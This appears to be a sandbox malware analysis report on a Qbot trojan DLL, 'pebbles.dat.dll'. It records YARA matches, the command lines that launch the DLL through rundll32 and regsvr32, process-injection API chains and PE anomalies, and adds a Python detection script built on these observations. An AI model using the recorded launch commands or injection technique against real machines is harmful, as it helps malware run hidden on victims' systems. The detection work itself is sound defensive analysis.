          Source: 3.2.regsvr32.exe.3160000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 3.2.regsvr32.exe.3160000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 7.0.wermgr.exe.2c60000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 7.0.wermgr.exe.2c60000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 4.3.rundll32.exe.32e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 4.3.rundll32.exe.32e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000003.00000002.252637894.0000000003160000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000004.00000003.245679829.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000004.00000003.245679829.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000009.00000000.252174416.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000009.00000000.252174416.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000007.00000000.251843249.0000000002C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000007.00000000.251843249.0000000002C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000003.00000003.245541502.0000000003140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000003.00000003.245541502.0000000003140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000008.00000002.254770959.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000008.00000002.254770959.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000008.00000000.251930910.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000008.00000000.251930910.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000005.00000002.252831702.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000005.00000002.252831702.0000000004A60000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000005.00000003.246084770.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000005.00000003.246084770.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000007.00000002.254795791.0000000002C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000007.00000002.254795791.0000000002C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 00000004.00000002.252645898.0000000003460000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_0317676F
          Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_031763B0
          Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_031782A0
          Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_031735EE
          Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_031729E9
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0347676F
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_034763B0
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_034782A0
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_034735EE
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_034729E9
          Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_0316D538 NtCreateSection,DefWindowProcW,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,lstrlenW,NtUnmapViewOfSection,NtClose
          Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_0316D9DE GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0346D538 NtCreateSection,DefWindowProcW,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,lstrlenW,NtUnmapViewOfSection,NtClose
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0346D9DE GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory
          Source: pebbles.dat.dll.9.dr Static PE information: No import functions for PE file found
          Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll
          Source: pebbles.dat.dll.9.dr Static PE information: Data appended to the last section found
          Source: pebbles.dat.dll ReversingLabs: Detection: 16%
          Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\pebbles.dat.dll"
          Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1
          Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\pebbles.dat.dll
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1
          Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\pebbles.dat.dll,DllRegisterServer
          Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\pebbles.dat.dll,DllUnregisterServer
          Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe
          Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe
          Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe
          Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\pebbles.dat.dll,bewailable
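The process tree above (loaddll32.exe driving rundll32.exe and regsvr32.exe against a module named pebbles.dat.dll, each of which then spawns wermgr.exe) and the two injection functions listed earlier (3_2_0316D538: NtCreateSection, NtMapViewOfSection x2, VirtualAllocEx, WriteProcessMemory, NtUnmapViewOfSection; 3_2_0316D9DE: GetThreadContext, NtProtectVirtualMemory, NtWriteVirtualMemory, NtProtectVirtualMemory) are the two observations a detection engineer would turn into rules. The script below is an added example, not part of the Joe Sandbox report or of any vendor's rule set: it runs three checks over events constructed from the report's own lines. Event field names (ParentImage, Image, CommandLine) are an assumption modelled on Sysmon Event ID 1; the benign control event (svchost.exe starting wermgr.exe) is constructed and assumed typical, since the report contains no benign WER activity.

```python
"""Triage rules over what the report shows: rundll32/regsvr32 loading a module
with a double extension, wermgr.exe spawned by those DLL hosts, and the ordered
API chains of the two injection functions. Added example, not Joe Sandbox code."""
import ntpath

# Constructed from the report's "Process created" lines, plus one constructed
# benign control (assumed typical: the WER service host starts wermgr.exe).
PROCESS_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\loaddll32.exe", "Image": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": r'cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1'},
    {"ParentImage": r"C:\Windows\System32\loaddll32.exe", "Image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s C:\Users\user\Desktop\pebbles.dat.dll"},
    {"ParentImage": r"C:\Windows\SysWOW64\cmd.exe", "Image": r"C:\Windows\SysWOW64\rundll32.exe",
     "CommandLine": r'rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1'},
    {"ParentImage": r"C:\Windows\System32\loaddll32.exe", "Image": r"C:\Windows\SysWOW64\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Users\user\Desktop\pebbles.dat.dll,DllRegisterServer"},
    {"ParentImage": r"C:\Windows\SysWOW64\regsvr32.exe", "Image": r"C:\Windows\SysWOW64\wermgr.exe",
     "CommandLine": r"C:\Windows\SysWOW64\wermgr.exe"},
    {"ParentImage": r"C:\Windows\SysWOW64\rundll32.exe", "Image": r"C:\Windows\SysWOW64\wermgr.exe",
     "CommandLine": r"C:\Windows\SysWOW64\wermgr.exe"},
    {"ParentImage": r"C:\Windows\System32\svchost.exe", "Image": r"C:\Windows\System32\wermgr.exe",
     "CommandLine": r"C:\Windows\System32\wermgr.exe -upload"},   # constructed benign control
]

# Constructed from the two "Code function" API chains the report lists for
# regsvr32.exe (3_2_0316D538 and 3_2_0316D9DE), in the order printed there.
API_TRACES = {
    "regsvr32.exe 3_2_0316D538": ["NtCreateSection", "DefWindowProcW", "RegisterClassExA", "CreateWindowExA",
                                  "DestroyWindow", "UnregisterClassA", "NtMapViewOfSection", "NtMapViewOfSection",
                                  "VirtualAllocEx", "WriteProcessMemory", "lstrlenW", "NtUnmapViewOfSection", "NtClose"],
    "regsvr32.exe 3_2_0316D9DE": ["GetThreadContext", "NtProtectVirtualMemory", "NtWriteVirtualMemory",
                                  "NtProtectVirtualMemory"],
}

DLL_HOSTS = {"rundll32.exe", "regsvr32.exe"}

# Ordered API subsequences (other calls may sit in between), labelled with the
# report's own signature names.
INJECTION_PATTERNS = {
    "Maps a DLL or memory area into another process":
        ["NtCreateSection", "NtMapViewOfSection", "NtMapViewOfSection", "NtUnmapViewOfSection"],
    "Writes to foreign memory regions":
        ["VirtualAllocEx", "WriteProcessMemory"],
    "Overwrites code in foreign process (protection flipped around the write)":
        ["GetThreadContext", "NtProtectVirtualMemory", "NtWriteVirtualMemory", "NtProtectVirtualMemory"],
}


def module_from_cmdline(cmdline):
    """Path of the module a rundll32/regsvr32 command line loads, or None.
    rundll32 takes `module,export`; regsvr32 takes the path after its switches."""
    for tok in cmdline.split():
        if ":\\" in tok:
            return tok.split(",")[0].strip('"')
    return None


def check_process(ev):
    findings = []
    image = ntpath.basename(ev["Image"]).lower()
    parent = ntpath.basename(ev["ParentImage"]).lower()
    if image in DLL_HOSTS:
        mod = module_from_cmdline(ev["CommandLine"])
        if mod:
            parts = ntpath.basename(mod).lower().split(".")
            if parts[-1] != "dll" or len(parts) > 2:      # x.dat.dll, x.dat, x.png ...
                findings.append(f"{image} loads module with suspicious extension: {mod}")
    if image == "wermgr.exe" and parent in DLL_HOSTS:
        findings.append(f"wermgr.exe spawned by {parent} (expected parent: the WER service host)")
    return findings


def is_subsequence(pattern, trace):
    """True when every call in pattern occurs in trace, in that order."""
    it = iter(trace)
    return all(any(call == want for call in it) for want in pattern)


def check_trace(name, trace):
    return [f"{name}: {label}" for label, pat in INJECTION_PATTERNS.items() if is_subsequence(pat, trace)]


def triage(events=PROCESS_EVENTS, traces=API_TRACES):
    findings = []
    for ev in events:
        findings.extend(check_process(ev))
    for name, trace in traces.items():
        findings.extend(check_trace(name, trace))
    return findings


if __name__ == "__main__":
    for f in triage():
        print(f)
```

Against the constructed events this yields eight findings: three double-extension loads (regsvr32 and both rundll32 invocations), two wermgr.exe children of a DLL host, two chain matches in 3_2_0316D538 and one in 3_2_0316D9DE; the svchost.exe control produces none. The subsequence check deliberately tolerates the window-class calls the sample interleaves between NtCreateSection and NtMapViewOfSection, which is what defeats an exact-sequence signature.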
          Source: C:\Windows\SysWOW64\wermgr.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Qyioamjyn
          Source: classification engine Classification label: mal96.troj.evad.winDLL@20/1@0/0
          Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_0316E485 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket
          Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_0316BAF6 CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\pebbles.dat.dll",#1
          Source: C:\Windows\SysWOW64\wermgr.exe Mutant created: \Sessions\1\BaseNamedObjects\{87A9C091-A3AF-4261-9AFC-CA51D21F1994}
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5868:120:WilError_01
          Source: C:\Windows\SysWOW64\wermgr.exe Mutant created: \Sessions\1\BaseNamedObjects\{5CABA7A4-044A-4BD5-8AE5-94537A2F3136}
          Source: C:\Windows\SysWOW64\wermgr.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\{5CABA7A4-044A-4BD5-8AE5-94537A2F3136}
          Source: pebbles.dat.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: pebbles.dat.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: pebbles.dat.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: pebbles.dat.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: pebbles.dat.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: pebbles.dat.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: pebbles.dat.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
          Source: pebbles.dat.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: E:\cpp\out\out\desktop.pdb source: regsvr32.exe, 00000003.00000002.252814839.000000006D954000.00000080.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.253212407.000000006D954000.00000080.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.252999477.000000006D954000.00000080.00000001.01000000.00000003.sdmp, pebbles.dat.dll
          Source: Binary string: amstream.pdb source: wermgr.exe, 00000007.00000003.254565864.0000000003051000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000008.00000003.254363547.0000000003491000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.253774638.0000000002F31000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: amstream.pdbGCTL source: wermgr.exe, 00000007.00000003.254565864.0000000003051000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000008.00000003.254363547.0000000003491000.00000004.00000800.00020000.00000000.sdmp, wermgr.exe, 00000009.00000003.253774638.0000000002F31000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_0317CB95 push esi; iretd 3_2_0317CB9A
          Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_0317AEB6 push cs; iretd 3_2_0317AE8A
          Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_0317ADB4 push cs; iretd 3_2_0317AE8A
          Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_0317B066 push ebx; ret 3_2_0317B067
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0347CB95 push esi; iretd 4_2_0347CB9A
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0347AEB6 push cs; iretd 4_2_0347AE8A
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0347ADB4 push cs; iretd 4_2_0347AE8A
          Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0347B066 push ebx; ret 4_2_0347B067
          Source: pebbles.dat.dll Static PE information: section name: .reloc6s
          Source: pebbles.dat.dll Static PE information: section name: .hata
          Source: pebbles.dat.dll.9.dr Static PE information: section name: .reloc6s
          Source: pebbles.dat.dll.9.dr Static PE information: section name: .hata
          Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_0316EF38 LoadLibraryA,GetProcAddress
          Source: initial sample Static PE information: section where entry point is pointing to: .data
          Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\pebbles.dat.dll
          Source: initial sample Static PE information: section name: .data entropy: 7.0153365923230595
          Source: C:\Windows\SysWOW64\wermgr.exe File created: C:\Users\user\Desktop\pebbles.dat.dll
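The static findings scattered through this section (entry point in .data rather than a code section, .data entropy above 7, the non-standard section names .reloc6s and .hata, an import directory and IAT that are present yet import no functions, data appended after the last section, DYNAMIC_BASE and NX_COMPAT set) are all readable straight from the PE headers. The following script is an added example, not code from the report or from Joe Sandbox: it implements those checks with a minimal PE32/PE32+ header parser and an import-descriptor walk, and builds a small constructed PE32 DLL in memory that mimics the sample's layout so the checks run offline. The constructed image is not the sample, and the entropy threshold of 7.0 and the list of "standard" section names are my own choices.

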